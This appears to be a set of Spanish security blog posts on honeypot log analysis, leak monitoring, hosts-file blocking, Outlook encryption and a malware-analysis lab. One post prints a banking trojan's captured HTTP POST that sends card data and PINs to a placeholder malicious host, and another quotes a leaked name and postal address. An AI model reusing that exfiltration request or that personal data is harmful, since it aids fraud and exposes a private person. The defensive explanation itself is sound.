Kippo que es el honeypot que estoy usando va guardando un log por día, ahora mismo tengo unos 6 archivos de log distintos así que ahora lo que voy ha hacer es contar la cantidad de logones fallidos del total de logs.

cat kippo.log | awk ‘/failed/ { print $5 }’ | grep -v on | wc -l

En una semana el resultado a sido de 4782 accesos de logon fallidos. ¿Increible no?

Ahora vamos al apartado de las Ip’s porque al intentar el acceso de logon, la IP queda registrada.

Para extraer la IP:

cat kippo.log.6 | awk ‘/HoneyPotTransport/ { print $3 }’ | cut -d “,” -f3 | grep -v SSH | cut -d “]” -f1 | sort -u

Han habido 7 IP’s implicadas en el ataque, de estas Ip, los ataques vienen de EStados unidos, de China, de Mongolia, y.. de ESPAÑA!

La lista de IP’s era:

116.114.20.148
173.255.246.112
199.127.103.157
203.34.37.16
211.154.224.238
37.157.249.167
80.103.180.135

Ahora pasamos a la parte de usuarios y password, empezamos

 cat kippo.log.6 | awk ‘/attempt/ { print $9 }’ | cut -d “[" -f2 | cut -d "]” -f1

La cantidad de combinaciones que se han usado es 4502

De estas combinaciones, la cantidad de usuarios únicos ha sido de 3744

Para la parte de contraseñas se han usado 4034

En la parte de RDP, que también dejé capturando que llegaba, también han habido resultados

Las ip’s registradas son:

112.64.207.90
12.198.222.17
125.211.197.142
184.105.139.216
204.140.27.133
211.191.168.25
229.143.195.200
2.50.27.150
82.144.67.181

Son Ip’s procedentes de Rusia, China, Emiratos Árabes etc..

Dentro de poco tengo pensado montar otro tipo de Honeypot, de parte web por ejemplo. Será una buena fuente de información

Hay que tener mucho cuidado con lo que se va dejando por ahí, un log en Pastebin, Metadatos en los documentos, son cosas que cada vez hay que concienciarse de que no se deben tomar a la ligera.

Ya existen herramientas que monitorizan Pastebin, de manera que cuando aparece un dato de interés a los que estan detrás de esa informaciónes les es, muy fácil el poder enterarse.

Otro tipo de servicios es el que traigo se trata leakedin, Este servicio se encarga de dar a conocer en que sitios (Pastebin), se ha colgado información que podria ser, mas bien información personal.  Un archivo subido a Dropbox, una clave RSA etc..

Podemos encontrara cosas como:

Detected 1 occurrence(s) of ‘http[s]*:\/\/dl\.dropbox\.com\/’:

<img src="http://dl.dropbox.com/u/149660/389075560.jpg">

Send a SELF-ADDRESSED STAMPED ENVELOPE (this means it has your address already written on it and an unused stamp in the upper-right corner!) to:

Ben Combee<br>
5607 Joe Sayers Ave<br>
Austin, TX 78756<br>

If you include somethin

Sin duda interesante.

La web del proyecto la podéis encontrar aquí.

Tened cuidado lo que vais dejando por ahí.

Una de las cosas bastante eficaces que se pueden es que a ciertos dominios/IP no nos podamos conectar, así nos protegeremos. ¿Como se consigue esto? Pues haciendo que dichas peticiones a ciertos sitios siempre vayan 127.0.0.1 es decir, a localhost.

¿Esto de que nos libra?

Pues nos libra de que si navegamos por ejemplo por páginas webs legítimas, que contienen por ejemplo un iframe a un “conocido” host que contiene malware la conexión no se realizará.

Otro caso es por ejemplo el de troyanos que se dedican por ejemplo a pedirte los datos bancarios “por seguridad”. Obviamente estos troyanos lo que buscan es engañar al usuario para que introduzca sus datos bancarios y poder enviarlos a un host destino.

Si miramos ese tipo de trazas con Wireshark, veríamos algo del tipo

POST /images/check.asp HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 962
Host: DOMINIO_MALICIOSO
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)

1=45678976&2=1234&3=1234&4=47897654&5=4567&6=5467&7=5879654774587741&8=06%2F14&9=887&10=7188&11=145%2D4564&12=146%2D5646&13=147%2D5456&14=148%2D4564&15=149%2D5645&16=150%2D6156&17=151%2D1894&18=152%2D8918&19=153%2D9189&20=154%2D1891&21=155%2D8984&22=156%2D5445&23=157%2D6156&24=158%2D1561&25=159%2D5615&26=160%2D6118&27=161%2D9948&28=162%2D9489&29=163%2D1891&30=164%2D8918&31=165%2D1891&32=166%2D8189&33=167%2D1891&34=168%2D8918&35=169%2D9189&36=170%2D1891&37=171%2D8918&38=172%2D1891&39=173%2D1998&40=174%2D1891&41=175%2D8918&42=176%2D9115&43=177%2D1561&44=178%2D1156&45=179%2D1565&46=180%2D1561&47=181%2D5619&48=182%2D1984&49=183%2D8948&50=184%2D9189&51=185%2D1891&52=186%2D9919&53=187%2D8189&54=188%2D1891&55=189%2D8918&56=190%2D9189&57=191%2D1189&58=192%2D1891&59=193%2D8918&60=194%2D9189&61=195%2D8918&62=196%2D9891&63=197%2D8918&64=198%2D9189&65=199%2D1981&66=200%2D8918&67=201%2D9189&68=202%2D1981&69=203%2D8918&70=204%2D9811&71=manodacaixa%40gmail%2Ecom&HTTP/1.1 200 OK
Connection: keep-alive
Date: Tue, 22 May 2012 12:40:57 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASSSCADB=BIJLMGIBAJPPPDFIDBPMKBJH; path=/
Cache-control: private

Todo el “churro” que se envía son los datos que el usuario ha rellenado sobre su tarjeta, su PIN etc…

Si el HOST destino, ya se conoce como malicioso los datos nunca se enviarían, es decir, nos ofrece protección en la navegación y en el envío de datos a URL/Ip maliciosas.

Otro tipo de troyanos, lo que hacen es, una vez que han infectado la máquina se descargan mas binarios de su servidor que les hace de panel de control (C&C).

Se podría mitigar también redirigiendo las peticiones a localhost.

Y es  por eso, por lo que proyectos como hphosts nos ayudan en esta tarea.

Descargamos el archivo de aquí

¿Que tenemos en este archivo?

C:\Users\seifreed\Downloads\hphosts>wc -l HOSTS.txt
183792 HOSTS.txt

Tenemos  183792 entradas repartidas entre IP’S y URL que son de carácter malicioso, de manera que si intentan conectarse fallarán.

Y eso es todo por hoy

He probado diversidad de software y al final la solución que mejor me ha ido es la que menos me esperaba, desde luego.

Uno de los primeros software que probé fue el de GPG4Win, este Software ne funciono bien en otras ocasiones con versiones de Outlook 2003 y 2007, funcionaba bien, y no quedaba colgado ni nada.

Pero en las nuevas versiones de Outlook, la 2010 ya no funciona , Entonces probé otro software, gpg4o, este software una vez lo instalas parece que todo es muy bonito pero es una trial por lo que poco puedes usarlo en realidad.

Otro de los software que aparecía como referencia es OutlookGnuGPG. Este addon es solo para Outlook 2007, así que también te quedas sin soporte en las últimas versiones de Outlook 2010.

Además estaba buscando una solución que no me volviera el cliente de correo lento.. y que me permitiera elegir de manera “elegante” las claves.

Y por fin “llego la luz” y pude encontrar la solución que estaba buscando, se trata de Outlook privacy plugin.

Este addon funciona PERFECTAMENTE en versiones Outlook 2010 tanto en x86 como en x64.

Así que, no sufráis mas, con esto ya os sirve por si necesitáis poder firmar en Outlook 2010.

Se trata de Outlook privacy plugin

Se queda instalado como un complemento mas en Outlook

Así que quedará perfectamente instalado para que se pueda usar de manera cómoda.

Hace ya semanas que mi ordenador de sobremesa murió y la verdad es que no lo estaba usando para nada y quería volver a recuperar mi estación de trabajo, este ordenador se me ha quedado ya pobre ya que no renuevo nada de él desde que me lo compré hace 4 años. Entonces el ordenador tenía 4GB de RAM y un Intel Core Dos Duo, ahora se me ha estropeado una ranura de RAM así que ahora se me ha quedado con 3GB :\

En fin, decidí quitarme Windows 7, y me he puesto Ubuntu Server, así que lo usaré para trabajar si hace falta ahora mismo trabajo mucho con mi portátil es donde tengo todas las máquinas virtuales y hago todas las pruebas para el blog.

Cuando me instalo el ordenador de casa, la verdad es que le habilito varios servicios para mi imprescindibles, uno de ellos es OpenVPN así puedo acceder de manera segura a los recursos de la red, por si necesito algo, y me otorga privacidad si quiero tunelizar conexiones a través de ahí.

También habilito SSH, para conexiones con mi máquina trasferencia de ficheros etc.. Evidentemente nunca en los puertos por defecto.

Otra de las cosas que me sirven para montarme un Proxy y navegar, por ejemplo, de manera anónima es montar Tor, que además me otorga privacidad y anonimato. Tor lo puedes encadenar con privoxy y Polipo para obtener una mayor satisfacción.

Además activaré mis servicios de HoneyPot que tengo creados para obtener Intel de los ataques.

Pues nada, después de ordenar las cosas, y ponerme al día vuelvo a escribir aquí ;D

Creo que todo el mundo se apenó cuando la serie de cálico dejó de emitirse, así que para mas de uno y entre los que me incluyo estamos MUY contentos de que haya vuelto. Además ahora cuenta con el Soporte de Informática64, así que seguro que Chema no dejará que el proyecto se hunda 

Recordar seguir a Cálico Electrónico

Aprovechando que tenía que flashear uno Nexus One el otro día aproveche para poner oden al mío, así que me bajé la última versión de MIUI y me la instalé también. Me quité la versión que tenía de ICS ya que me estaba yendo bastante lento y me cansé de tenerlo. En fin, de momento con MIUI que  ya lo había probado estoy MUY contento, va muy fino y tiene un ‘look and feel’ que me gusta mucho.

Espero dentro de poco tener algo mas de tiempo para poner mas cosas en el blog que lo de escribir un POST diario sigue en pie

A cuidarse!

Algunos pensarán que estoy así:

a

Lo mejor para realizar estas pruebas es montar un escenario virtualizado, existen herramientas que detectan la máquina virtual y no se ejecutan pero ya lo veremos mas adelante…

Como software para montar el escenario virtual podemos usar Virtualbox o VMware, en mi caso uso VMware me conozco el software y me gusta, pero os recomiendo usar Virtualbox, es una pasada y funciona de maravilla

Como máquina víctima usaremos un Windows XP SP2, el tamaño de la partición debería de ser de 50GB y el Windows debería de estar sin software adicional salvo el que viene instalado y el que pondremos aquí.

No hace falta asignarle mucha memoria RAM a la máquina, pensad que será una máquina que usaremos para hacer el análisis dinámico del malware y, por lo tanmto necesitamos que sea una máquina rápida que podamos trabajar de manera cómoda.

Con VMware tenemos la facilidad de poder analizar todo el tráfico de la máquina virtual recogiendo el tráfico directamente de la tarjeta virtual de VMware.

Será muy fácil el poder hacer el análisis del tráfico de esta manera.

Es muy importante realizar el análisis del tráfico desde fuera de la máquina virtual, ya que ciertos samples de malware pueden no mostrar el tráfico real